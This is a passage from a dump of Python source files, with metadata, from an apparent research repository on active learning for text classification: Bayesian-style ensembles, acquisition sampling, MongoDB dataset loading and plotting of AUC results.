)\n\n fit_output.append(\n self.model.fit(\n DataLoader(\n training_dataloader,\n batch_size=BATCH_SIZE,\n shuffle=True,\n collate_fn=self.collate,\n ),\n training_dataloader.features_size,\n )\n )\n\n if None not in fit_output:\n return fit_output\n else:\n return None\n\n def predict(\n self,\n instances: Union[List[Dict[str, Any]], List[List[torch.Tensor]]],\n transformation_needed: bool = True,\n ) -> List[Any]:\n if transformation_needed:\n print(\"transforming instances for model prediction...\")\n instances = self.transformator.transform_instances(instances)\n\n pred_dataset = PeonyDataset(\n instances,\n torch.zeros((len(instances))),\n )\n\n predicted = self.model.predict(\n DataLoader(\n pred_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n collate_fn=self.collate,\n )\n )\n\n return np.mean([np.argmax(pred, axis=1) for pred in predicted], axis=0)\n\n def reset(self) -> None:\n self.model.reset()\n\n def get_learning_samples(\n self,\n instances: Union[List[Dict[str, Any]], List[torch.Tensor]],\n transformation_needed: bool = True,\n ) -> np.ndarray:\n if transformation_needed:\n print(\"transforming instances for model getting learning sample...\")\n instances = self.transformator.transform_instances(instances)\n\n pred_dataset = PeonyDataset(\n instances,\n torch.zeros((len(instances))),\n )\n predicted = self.model.predict(\n DataLoader(\n pred_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n collate_fn=self.collate,\n )\n )\n if self.acquisition_function is not None:\n if np.random.uniform(0, 1) > self.epsilon_greedy_coef:\n self.epsilon_greedy_coef = self.greedy_coef_decay(self.active_learning_iteration)\n self.active_learning_iteration += self.active_learning_step\n return random_sampling(predicted, self.active_learning_step)\n else:\n self.epsilon_greedy_coef = self.greedy_coef_decay(self.active_learning_iteration)\n self.active_learning_iteration += self.active_learning_step\n active_learning_samples = int(round(self.active_learning_step * self.ascquisition_func_ratio))\n return np.concatenate(\n (\n self.acquisition_function(np.asarray(predicted), active_learning_samples, instances),\n random_sampling(\n predicted,\n self.active_learning_step - active_learning_samples,\n ),\n )\n )\n else:\n self.active_learning_iteration += self.active_learning_step\n return random_sampling(predicted, self.active_learning_step)\n\n def add_new_learning_samples(\n self,\n instances: Union[List[Dict[str, Any]], np.ndarray],\n labels: Union[List[Any], np.ndarray],\n transformation_needed: bool = True,\n ) -> None:\n if self.reset_after_adding_new_samples:\n self.reset()\n if transformation_needed:\n self.fit(instances, labels)\n else:\n self.fit(instances, labels, transformation_needed=False)\n"
},
{
"alpha_fraction": 0.6739884614944458,
"alphanum_fraction": 0.6751444935798645,
"avg_line_length": 31.037036895751953,
"blob_id": "2db9bb667bad71ef3f1544afc8954c9e4a73febc",
"content_id": "7fbb2ecefa37aa48ddaa25ed3dfe640c32fcbf7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 27,
"path": "/Peony_project/Peony_box/src/transformators/TweetsEmotion_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n HuffPostTransformWordEmbeddings,\n)\nfrom typing import Dict, Any\n\nCOLEECTION_NAME = \"Tweets_emotions_dataset\"\n\n\nclass TweetsEmotionsTransformWordEmbeddings(HuffPostTransformWordEmbeddings):\n def __init__(self):\n self.transformer = {}\n self.fitted: bool = False\n self.dict_length: int = 0\n self.api = MongoDb()\n self.encoding_mapper: Dict[int, int] = {}\n self.reverse_mapper: Dict[int, str] = {}\n\n @staticmethod\n def _transform_text(sample: Dict[str, Any]) -> str:\n return sample[\"record\"][\"text\"][\"body\"]\n\n def transform_label(self, sample: int) -> int:\n return self.encoding_mapper[sample]\n\n def transform_to_label(self, value: int) -> str:\n return self.reverse_mapper[value]\n"
},
{
"alpha_fraction": 0.5227272510528564,
"alphanum_fraction": 0.5757575631141663,
"avg_line_length": 25.399999618530273,
"blob_id": "6c50e4e385f92c05688401b61bf0ded9e92da1c9",
"content_id": "6d0ae4b32dbd334b232f0d6c30c2f5a769bd8c82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 5,
"path": "/Peony_project/Peony_box/src/greedy_coef_decay_functions/functions.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef sigmoid_decay(value: int) -> float:\n return np.exp((value - 3) * 0.1) / (np.exp((value - 3) * 0.1) + 1)\n"
},
{
"alpha_fraction": 0.6564729809761047,
"alphanum_fraction": 0.6615698337554932,
"avg_line_length": 31.700000762939453,
"blob_id": "52e837ccadc11b95b975f28668541e2c47c83166",
"content_id": "48356a39549de80ef4edbb59301b1acc464cd28b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 30,
"path": "/Peony_project/Peony_database/src/pretrained_models/embeddings/fasttext_embeddings.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import io\nimport numpy\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\nCOLLECTION_NAME = \"Fasttext_pretrained_embeddings\"\n\n\ndef load_data(path: Path) -> List[Dict[str, List[float]]]:\n fin = io.open(path, \"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\")\n data = []\n for line in tqdm(fin):\n tokens = line.rstrip().split(\" \")\n data.append({\"key\": tokens[0], \"value\": [float(val) for val in tokens[1:]]})\n return data\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 11\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"key\"]])\n transormed_record[\"record\"][\"key\"] = record[\"key\"]\n transormed_record[\"record\"][\"value\"] = record[\"value\"]\n\n return transormed_record\n"
},
{
"alpha_fraction": 0.5596546530723572,
"alphanum_fraction": 0.5745682716369629,
"avg_line_length": 29.33333396911621,
"blob_id": "f0431218e8e1125d8484069311880432c3083a2e",
"content_id": "6ceda8817a3920050027afebed7fdb0d783a5a65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 42,
"path": "/Peony_project/print_data.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom tabulate import tabulate\n\ndef main():\n api = MongoDb()\n\n results = list(api.database[\"models_results\"].find()) \n\n tabulate_list = []\n header = [\"mongo_id\", \"run_name\"] + list(range(1,11))\n\n batch_size = 0\n\n for result in results:\n \n if batch_size == 0:\n batch_size = int(result[\"learning_step\"])\n if batch_size != int(result[\"learning_step\"]):\n tabulate_list.append([\"\" for i in range(11)])\n batch_size = int(result[\"learning_step\"])\n\n name = f\"{result['model']}_{result['acquisition_function']}_{result['learning_step']}_{result['active_learning_iterations']}_{result['category_1']}_{result['category_2']}\"\n mean = np.mean(result[\"results\"],axis = 0)\n std = np.std(result[\"results\"],axis = 0)\n\n res_id = result[\"_id\"]\n\n results_list = [res_id, name]\n i_sampler = len(mean)//10\n\n for i, (m, s) in enumerate(zip(mean, std)):\n if (i+1) % i_sampler == 0:\n results_list.append(f\"{round(m[0],3)}±{round(s[0],3)}\")\n\n tabulate_list.append(results_list)\n\n print(tabulate(tabulate_list, headers=header, tablefmt='orgtbl'))\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6798858046531677,
"alphanum_fraction": 0.6897208094596863,
"avg_line_length": 28.735849380493164,
"blob_id": "df03a7f9cfbffbbd032d7bd6e06319044e4fb2e2",
"content_id": "bf9c61c605137e2ee54079276b9edfbed3c343c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3152,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 106,
"path": "/Peony_project/Peony_box/test_run.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport time\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_visualization.src.peony_visualization import calculate_binary_metrics\nfrom Peony_box.src.peony_box_model import PeonyBoxModel\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\n\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n # RoBERTaWordEmbeddings as transformator,\n FastTextWordEmbeddings as transformator,\n)\n\n# from Peony_database.src.datasets.Tweets_emotions_dataset import (\n# COLLECTION_NAME,\n# COLLECTION_ID,\n# )\n\nfrom Peony_database.src.datasets.HuffPost_news_dataset import (\n COLLECTION_NAME,\n COLLECTION_ID,\n)\n\nfrom Peony_box.src.acquisition_functions.functions import (\n entropy_sampling,\n batch_bald,\n hac_sampling,\n power_bald,\n)\nfrom scipy.sparse import vstack\nfrom sklearn.utils import shuffle\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom Peony_box.src.utils import k_fold_corss_validation, auc_metrics\nfrom sklearn.metrics import accuracy_score\n\n\ndef main():\n api = MongoDb()\n laebl_1 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=\"SPORTS\",\n limit=100,\n )\n\n laebl_2 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=\"COMEDY\",\n limit=100,\n )\n\n # laebl_1 = api.get_record(\n # collection_name=COLLECTION_NAME,\n # collection_id=COLLECTION_ID,\n # label=0,\n # limit=10,\n # )\n # laebl_2 = api.get_record(\n # collection_name=COLLECTION_NAME,\n # collection_id=COLLECTION_ID,\n # label=4,\n # limit=10,\n # )\n\n instances = laebl_1 + laebl_2\n labels = [sample[\"record\"][\"label\"] for sample in laebl_1 + laebl_2]\n\n instances, labels = shuffle(instances, labels, random_state=0)\n\n Transformator = transformator()\n Transformator.fit(instances, labels)\n # Transformator.fit(labels)\n\n peony_model = PeonyBoxModel(\n Transformator,\n active_learning_step=10,\n acquisition_function=power_bald, # entropy_sampling, batch_bald,\n )\n peony_model.bayesian_dropout_nn.fit(instances[:50], labels[:50])\n # peony_model.bayesian_denfi_nn.reset()\n peony_model.bayesian_dropout_nn.epsilon_greedy_coef = 1\n indexes = peony_model.bayesian_dropout_nn.get_learning_samples(instances[50:])\n\n add_training = [instances[index] for index in indexes.tolist()]\n add_labels = [labels[index] for index in indexes.tolist()]\n\n peony_model.bayesian_dropout_nn.add_new_learning_samples(add_training, add_labels)\n peony_model.bayesian_dropout_nn.fit(instances, labels)\n\n start_time = time.time()\n k_fold = k_fold_corss_validation(peony_model.bayesian_dropout_nn, Transformator, instances, labels, 2)\n print(f\"elapsed time is {time.time() - start_time}\")\n\n print(auc_metrics(k_fold))\n\n scores = [accuracy_score(eval[\"true\"], eval[\"predicted\"], normalize=True) for eval in k_fold]\n\n print(scores)\n print(\"test\")\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6232876777648926,
"alphanum_fraction": 0.6275684833526611,
"avg_line_length": 32.371429443359375,
"blob_id": "ff1bbade9678e19425b2bd96b2f653b3c98cca0f",
"content_id": "ccbf677d23fbaa878854be4d59b25ded900bf3f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 35,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/svm_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.base import clone\nfrom typing import List\n\nNUM_ENSEMBLES = 10\n\n\nclass PeonySVM:\n def __init__(self, rand_sample_ratio: float):\n self.ensembles = [SVC(kernel=\"linear\") for i in range(NUM_ENSEMBLES)]\n self.num_ensembles = NUM_ENSEMBLES\n self.num_of_samples: int = 0\n self.rand_sample_ratio = rand_sample_ratio\n\n def fit(self, instances: np.ndarray, labels: np.ndarray):\n self.num_of_samples = int(instances.shape[0] * self.rand_sample_ratio)\n for index in range(self.num_ensembles):\n indices = np.random.choice(\n instances.shape[0], self.num_of_samples, replace=False\n )\n self.ensembles[index].fit(instances[indices, :], labels[indices])\n\n def predict(self, instances: np.ndarray) -> List[np.ndarray]:\n predicted = [\n self.ensembles[index].predict(instances)\n for index in range(self.num_ensembles)\n ]\n return predicted\n\n def reset(self) -> None:\n self.ensembles = [\n clone(self.ensembles[index]) for index in range(self.num_ensembles)\n ]\n"
},
{
"alpha_fraction": 0.6647610068321228,
"alphanum_fraction": 0.6655550003051758,
"avg_line_length": 31.458763122558594,
"blob_id": "fe8b374798da5d7ac38fda1019ad16d9ed69570c",
"content_id": "d24b9cd709699699f874c613aacb616f543660d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6297,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 194,
"path": "/Peony_project/Peony_database/src/datasets/fill_in_the_database.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom pathlib import Path\nfrom PeonyPackage.PeonyDb import MongoDb\n\n# Imports for datasets upload\nfrom Peony_database.src.datasets.HuffPost_news_dataset import (\n COLLECTION_NAME as HuffPost_collection_name,\n transorm_data as HuffPost_transformer,\n load_data as HuffPost_loader,\n)\nfrom Peony_database.src.datasets.Newsgroups_dataset import (\n COLLECTION_NAME as NewsGroups_collection_name,\n transorm_data as NewsGroups_transformer,\n load_data as NewsGroups_loader,\n)\nfrom Peony_database.src.datasets.Tweets_emotions_dataset import (\n COLLECTION_NAME as Tweets_collection_name,\n transorm_data as Tweets_transformer,\n load_data as Tweets_loader,\n)\nfrom Peony_database.src.datasets.Comments_dataset import (\n COLLECTION_NAME as Comments_collection_name,\n transorm_data as Comments_transformer,\n load_data as Comments_loader,\n)\nfrom Peony_database.src.datasets.Emotions_dataset import (\n COLLECTION_NAME as Emotions_collection_name,\n transorm_data as Emotions_transformer,\n load_data as Emotions_loader,\n)\n\nfrom Peony_database.src.datasets.fake_news import (\n COLLECTION_NAME as fake_news_collection_name,\n transorm_data as fake_news_transformer,\n load_data as fake_news_loader,\n)\n\nfrom Peony_database.src.datasets.fake_news_detection import (\n COLLECTION_NAME as fake_news_detection_collection_name,\n transorm_data as fake_news_detection_transformer,\n load_data as fake_news_detection_loader,\n)\n\nfrom Peony_database.src.datasets.liar_paragraph import (\n COLLECTION_NAME as liar_paragraph_collection_name,\n transorm_data as liar_paragraph_transformer,\n load_data as liar_paragraph_loader,\n)\n\nfrom Peony_database.src.datasets.liar_full_text import (\n COLLECTION_NAME as liar_full_text_collection_name,\n transorm_data as liar_full_text_transformer,\n load_data as liar_full_text_loader,\n)\n\nfrom Peony_database.src.datasets.gibberish import (\n COLLECTION_NAME as gibberish_collection_name,\n transorm_data as gibberish_transformer,\n load_data as gibberish_loader,\n)\n\nfrom Peony_database.src.datasets.amazon_reviews import (\n COLLECTION_NAME as amazon_reviews_collection_name,\n transorm_data as amazon_reviews_transformer,\n load_data as amazon_reviews_loader,\n)\n\nfrom Peony_database.src.datasets.emotion_tweets import (\n COLLECTION_NAME as emotion_tweets_collection_name,\n transorm_data as emotion_tweets_transformer,\n load_data as emotion_tweets_loader,\n)\n\n# args for different datasets\ndef input_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--huffpost\", help=\"Path to HuffPost dataset\")\n parser.add_argument(\"--newsgroups\", help=\"Path to 4 newsgroups dataset\")\n parser.add_argument(\"--tweets\", help=\"Path to 1600k tweets (emotional semantics)\")\n parser.add_argument(\"--comments\", help=\"Path to comments dataset\")\n parser.add_argument(\"--emotions\", help=\"Path to emotional texts dataset\")\n parser.add_argument(\"--fake_news\", help=\"Path to fake news dataset\")\n parser.add_argument(\"--fake_news_detection\", help=\"Path to fake news detection dataset\")\n parser.add_argument(\"--liar_paragraph\", help=\"Path to liar (fake news) paragraph based dataset\")\n parser.add_argument(\"--liar_full_text\", help=\"Path to liar (fake news) paragraph based dataset\")\n parser.add_argument(\"--gibberish\", help=\"Path to gibberish dataset\")\n parser.add_argument(\"--amazon_reviews\", help=\"Path to amazon_reviews dataset\")\n parser.add_argument(\"--emotion_tweets\", help=\"Path to emotion_tweets dataset\")\n return parser\n\n\n# upload to mongo\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n\n if args.huffpost:\n api.load_data_to_database(\n HuffPost_collection_name,\n Path(args.huffpost),\n HuffPost_loader,\n HuffPost_transformer,\n )\n\n if args.newsgroups:\n api.load_data_to_database(\n NewsGroups_collection_name,\n Path(args.newsgroups),\n NewsGroups_loader,\n NewsGroups_transformer,\n )\n\n if args.tweets:\n api.load_data_to_database(\n Tweets_collection_name, Path(args.tweets), Tweets_loader, Tweets_transformer\n )\n\n if args.comments:\n api.load_data_to_database(\n Comments_collection_name,\n Path(args.comments),\n Comments_loader,\n Comments_transformer,\n )\n\n if args.emotions:\n api.load_data_to_database(\n Emotions_collection_name,\n Path(args.emotions),\n Emotions_loader,\n Emotions_transformer,\n )\n\n if args.fake_news:\n api.load_data_to_database(\n fake_news_collection_name,\n Path(args.fake_news),\n fake_news_loader,\n fake_news_transformer,\n )\n\n if args.fake_news_detection:\n api.load_data_to_database(\n fake_news_detection_collection_name,\n Path(args.fake_news_detection),\n fake_news_detection_loader,\n fake_news_detection_transformer,\n )\n\n if args.liar_paragraph:\n api.load_data_to_database(\n liar_paragraph_collection_name,\n Path(args.liar_paragraph),\n liar_paragraph_loader,\n liar_paragraph_transformer,\n )\n\n if args.liar_full_text:\n api.load_data_to_database(\n liar_full_text_collection_name,\n Path(args.liar_full_text),\n liar_full_text_loader,\n liar_full_text_transformer,\n )\n\n if args.gibberish:\n api.load_data_to_database(\n gibberish_collection_name,\n Path(args.gibberish),\n gibberish_loader,\n gibberish_transformer,\n )\n\n if args.amazon_reviews:\n api.load_data_to_database(\n amazon_reviews_collection_name,\n Path(args.amazon_reviews),\n amazon_reviews_loader,\n amazon_reviews_transformer,\n )\n\n if args.emotion_tweets:\n api.load_data_to_database(\n emotion_tweets_collection_name,\n Path(args.emotion_tweets),\n emotion_tweets_loader,\n emotion_tweets_transformer,\n )\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5787553787231445,
"alphanum_fraction": 0.5881974101066589,
"avg_line_length": 33.51852035522461,
"blob_id": "c863367ce85dd5fdfbdc5198d410c289d5ac8904",
"content_id": "8605f2c0158acd1a7e78a15e0b0a01cdb2d04c55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4660,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 135,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/dropout_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom Peony_box.src.peony_adjusted_models.neural_nets_architecture import (\n NeuralNet,\n NeuralNetLSTM,\n)\n\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader\nfrom typing import Optional, Tuple, List\n\nNUM_SAMPLES = 10\nEPOCHS_PER_SAMPLE = 50\nEPOCHS = 3000\nHOT_START_EPOCHS = 100\n# Device configuration\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nLEARNING_RATE = 0.001\nWEIGHTS_VARIANCE = 0.3\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nneural_network = NeuralNet\n\n# NUM_SAMPLES = 10\n# EPOCHS_PER_SAMPLE = 1\n# EPOCHS = 180\n# HOT_START_EPOCHS = 50\n# # Device configuration\n# DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# LEARNING_RATE = 0.001\n# WEIGHTS_VARIANCE = 0.10\n# neural_network = NeuralNetLSTM\n\n\nclass PeonyDropoutFeedForwardNN:\n def __init__(self, hidden_size: int, num_classes: int, cold_start=False, dropout_in_eval=True):\n\n self.num_samples = NUM_SAMPLES\n self.epochs_per_sample = EPOCHS_PER_SAMPLE\n self.starting_epoch = 0\n self.hot_start_epochs = HOT_START_EPOCHS\n\n self.model: Optional[List[nn.Module]] = None\n self.criterion: Optional[nn.CrossEntropyLoss] = None\n self.optimizer: Optional[torch.optim.Adam] = None\n\n self.hidden_size = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n self.cold_start = cold_start\n self.variance = WEIGHTS_VARIANCE\n self.dropout_in_eval = dropout_in_eval\n\n def fit(self, data: DataLoader, features_size: int) -> Optional[List[str]]:\n\n loss_list: List[str] = []\n\n if self.initialized is False:\n self.model = [\n neural_network(features_size, self.hidden_size, self.num_classes, dropout=0.2).to(DEVICE)\n for i in range(self.num_samples)\n ]\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.model[0].parameters(), lr=LEARNING_RATE)\n self.initialized = True\n\n fitted_loss_per_sample: List[float] = []\n for index in range(self.num_samples):\n\n if self.cold_start is False:\n with torch.no_grad():\n for param in self.model[index].parameters():\n param.add_(torch.randn(param.size()).to(DEVICE) * self.variance)\n\n if index != 0:\n self.model[index].load_state_dict(self.model[0].state_dict())\n self.starting_epoch = self.num_epochs\n self.num_epochs += self.epochs_per_sample\n\n for epoch in range(self.starting_epoch, self.num_epochs):\n\n for instances, labels in data:\n\n # Forward pass\n self.optimizer.zero_grad()\n\n outputs = self.model[0].train()(instances)\n\n loss = self.criterion(outputs, labels.to(DEVICE))\n # Backward and optimize\n loss.backward()\n self.optimizer.step()\n\n if epoch == 0:\n initial_loss_per_sample = loss.cpu().detach().numpy()\n\n fitted_loss_per_sample.append(loss.cpu().detach().numpy())\n loss_list.append(f\"starting loss is {initial_loss_per_sample}\")\n loss_list.append(f\"fitted loss (samples mean) is {np.mean(fitted_loss_per_sample)}\")\n\n if self.initialized and self.cold_start is False:\n self.starting_epoch = 0\n self.num_epochs = self.hot_start_epochs\n else:\n self.starting_epoch = 0\n self.num_epochs = EPOCHS\n\n return loss_list\n\n def predict(self, data: DataLoader) -> np.ndarray:\n predicted_list = []\n for index in range(self.num_samples):\n if not self.dropout_in_eval:\n self.model[index].eval()\n with torch.no_grad():\n predicted_list.append(\n np.concatenate(\n [self.model[index].predict(instances).data.cpu().detach().numpy() for instances, _ in data],\n axis=0,\n )\n )\n\n return predicted_list\n\n def reset(self) -> None:\n self.initialized = False\n self.num_epochs = EPOCHS\n self.starting_epoch = 0\n for index in range(self.num_samples):\n for name, module in self.model[index].named_children():\n if name not in [\"sigmoid\", \"softmax\", \"relu\", \"dropout\"]:\n module.reset_parameters()\n"
},
{
"alpha_fraction": 0.5214030742645264,
"alphanum_fraction": 0.524970293045044,
"avg_line_length": 38.11627960205078,
"blob_id": "3587a0d31ca8fab7287e0d538cbacdb3b69ad9e6",
"content_id": "a6a634aa482e2d23eec4f115534cfb8dec6d31fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1682,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 43,
"path": "/Peony_project/Peony_database/src/database_results/results_summary.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom typing import Dict\n\n\nclass PeonyDbResults:\n def __init__(self):\n self.api = MongoDb()\n self.data = self.api.get_model_results(filter_dict={})\n\n def structurize_data(self) -> Dict[str, Dict[\"str\", dict]]:\n structurized_data: Dict[str, Dict[\"str\", dict]] = {}\n for record in self.data:\n\n model = record[\"model\"]\n category_1 = record[\"category_1\"]\n category_2 = record[\"category_2\"]\n dataset = f\"{category_1} / {category_2}\"\n acquisition_function = record[\"acquisition_function\"]\n\n if model not in structurized_data:\n structurized_data[model] = {dataset: {acquisition_function: record}}\n else:\n if dataset not in structurized_data[model]:\n structurized_data[model][dataset] = {acquisition_function: record}\n else:\n if acquisition_function not in structurized_data[model][dataset]:\n structurized_data[model][dataset][acquisition_function] = record\n else:\n structurized_data[model][dataset][acquisition_function][\n \"results\"\n ] = (\n structurized_data[model][dataset][acquisition_function][\n \"results\"\n ]\n + record[\"results\"]\n )\n return structurized_data\n\n\nif __name__ == \"__main__\":\n results = PeonyDbResults()\n structurized_results = results.structurize_data()\n print(\"finished\")\n"
},
{
"alpha_fraction": 0.4909553825855255,
"alphanum_fraction": 0.5185582041740417,
"avg_line_length": 27.0563907623291,
"blob_id": "2e96923603cd36ac2ce4ad009c15b0ba62e94fd8",
"content_id": "f2a9bc94e34077252ab51f3f44014be824b16dff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7463,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 266,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/plots_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport json\nimport re\nimport pandas as pd\n\nfrom typing import List, Any, Dict\nfrom Peony_visualization.src.batch_active_learning_article.result_ids import DATA\nfrom matplotlib.ticker import FormatStrFormatter\n\n\ndef visualize_auc_evolutions(\n ax,\n markevery,\n auc_seq_passive_1,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n batch,\n title,\n index,\n):\n\n auc_1_passive_mean = auc_seq_passive_1[\"results_mean\"].values.flatten().tolist()[0]\n auc_1_passive_std = auc_seq_passive_1[\"results_std\"].values.flatten().tolist()[0]\n\n auc_1_active_mean = auc_seq_active_1[\"results_mean\"].values.flatten().tolist()[0]\n auc_1_active_std = auc_seq_active_1[\"results_std\"].values.flatten().tolist()[0]\n\n auc_2_active_mean = auc_seq_active_2[\"results_mean\"].values.flatten().tolist()[0]\n auc_2_active_std = auc_seq_active_2[\"results_std\"].values.flatten().tolist()[0]\n\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n ax.grid(alpha=0.2)\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean,\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Random Selection {model_1} mean\",\n alpha=0.4,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean + auc_1_passive_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean - auc_1_passive_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean,\n linestyle=\"-\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Active Learning {model_1} mean\",\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean + auc_1_active_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean - auc_1_active_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean,\n linestyle=\"-\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Active Learning {model_2} mean\",\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean + auc_2_active_std,\n linestyle=\"-\",\n color=\"g\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean - auc_2_active_std,\n linestyle=\"-\",\n color=\"g\",\n alpha=0.1,\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_1_passive_mean + auc_1_passive_std),\n (auc_1_passive_mean - auc_1_passive_std),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_1_active_mean + auc_1_active_std),\n (auc_1_active_mean - auc_1_active_std),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_2_active_mean + auc_2_active_std),\n (auc_2_active_mean - auc_2_active_std),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.set_xlabel(\"Requests\", fontsize=13.5)\n if index == 0:\n ax.set_ylabel(\"AUC\", fontsize=13.5)\n ax.set_title(\n title,\n fontsize=16,\n )\n ax.legend(loc=\"lower right\", fontsize=10)\n\n return ax\n\n\ndef get_collection_results() -> Dict[str, List[List[float]]]:\n collection_results = {}\n with open(\"Peony_visualization/src/batch_active_learning_article/collection.json\", \"r\") as f:\n for l in f.readlines():\n data = json.loads(l)\n collection_results[data[\"_id\"][\"$oid\"]] = data[\"results\"]\n return collection_results\n\n\ndef merge_resuls_and_metadata(\n resutls: Dict[str, List[List[float]]], metadata: List[List[str]]\n) -> pd.DataFrame:\n list_2_df: List[Any] = []\n for row in metadata:\n id_res = np.array(resutls[row[0]]).squeeze(2)\n\n batch = re.search(r\"(100|50|20|10)\", row[2])\n batch_span = batch.span() # type: ignore\n batch_int = int(batch.group(0)) # type: ignore\n\n warm_start = re.search(r\"warm_start\", row[2])\n if warm_start:\n alg = row[2][: batch_span[0] - 1] + \"_warm_start_\" + row[3]\n 